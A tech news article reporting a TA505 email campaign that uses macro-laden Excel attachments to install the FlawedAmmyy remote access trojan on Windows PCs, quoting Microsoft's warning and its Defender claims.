Microsoft is one among the well-known and biggest PC operating systems in the world right now and due to this, the company’s products are used by a majority of the people. However, it is also one of the reasons that it is constantly targeted by hackers, viruses, malware and other infections. Previously, we saw that the around 1 million computers running Windows OS were exposed to a security exploit. Now, the company has made the headlines again as a new malware is attacking the Windows system using Microsoft’s own MS Office software’s macro functions. The malware uses the complex infection chain to download and run the FlawedAmmyy RAT malware directly to the PC’s memory.
The malware attacks start with an email and an .xls attachment. The attachment has content written in Korean language that hints that the malware has currently made Korean users as its primary target. The malware uses malicious macro features of the MS Excel spreadsheet attachment to attack the Windows PC.
According to a security firm Proofpoint, the malicious attack campaign was started by a group named TA505. They were caught in the past using similar patterns to attack the PC using malware. The security firm further states that this time, the group is using a malicious email along with an Excel attachment which Microsoft itself has asked the users not to open.
Microsoft has warned the users about the malware attacks using its Twitter account. It has tweeted, “When opened, the .xls file automatically runs a macro function that runs msiexec.exe, and that, in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory.”
Microsoft has also said that its Threat Protection defends the users from this type of attacks. According to the company, “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign.”
Once the user downloads the attachment on his system, the malware also installs a file named wsus.exe. The downloaded file is then decrypted and it is designed in such a way that it would pass off as an official Microsoft Windows Service Update Service (WSUS). The digital signature of the file is signed on June 19 and it then decrypts the payload it is carrying in the RAM. The payload is none other than FlawedAmmyy Rat that has a notorious reputation.
or the latest gadget and tech news, and gadget reviews, follow us on Twitter, Facebook and Instagram. For newest tech & gadget videos subscribe to our YouTube Channel. You can also stay up to date using the Gadget Bridge Android App